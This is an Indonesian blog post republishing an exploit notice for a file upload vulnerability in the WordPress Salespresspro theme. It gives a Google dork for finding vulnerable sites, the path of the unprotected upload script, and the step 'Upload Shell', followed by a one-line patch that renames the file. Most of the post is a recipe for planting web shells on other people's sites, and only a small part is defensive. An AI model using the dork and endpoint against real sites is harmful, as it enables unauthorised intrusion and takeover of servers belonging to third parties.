Halaman

Wordpress Salespresspro Theme File Upload Vulnerability

Sabtu, 26 September 2015
#-Title: Wordpress Salespresspro Theme File Upload Vulnerability
#-Author: unknown
#-Date: 18/01/2015
#- Vendor : Mark Dulisse
#- Link Download : sites.google.com/site/getsalespresspro20get/
#-Google Dork: inurl:wp-content/themes/Salespresspro
#- Tested on : Windows 7
#- Fixed in v2.0
==========================================================================

Proof Of Concept :

http://site.com/wp-content/themes/salespresspro/headerimgbgblog-upload.php  

Upload Shell > Buka di tab baru / lewat inspect elemen

Patch :

 baru / Simply cuman rename headerimgbgblog-upload.php jadi headerimgbgblog-upload.txt

Tidak ada komentar:

Posting Komentar